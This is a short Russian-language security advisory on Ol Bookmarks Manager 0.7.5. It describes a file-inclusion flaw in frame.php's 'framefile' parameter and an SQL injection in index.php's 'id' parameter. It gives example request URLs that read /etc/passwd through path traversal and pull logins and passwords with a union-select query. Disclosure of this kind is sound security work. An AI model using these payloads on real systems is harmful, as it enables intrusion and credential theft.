Программа: Ol Bookmarks Manager 0.7.5

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе и выполнить произвольные SQL команды в базе данных
приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «framefile» сценарием frame.php. Удаленный пользователь может
выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера.

Эксплоит:

/frame.php?framefile=[Shell]
/frame.php?framefile=../../../../../../etc/passwd

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «id» сценарием index.php. Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

Эксплоит:

/read/index.php?name=brian&id=-0000008+union+select+
1,2,3,4,password,login,7,8,9,10,12,11,13+from+preferences—



Оставить мнение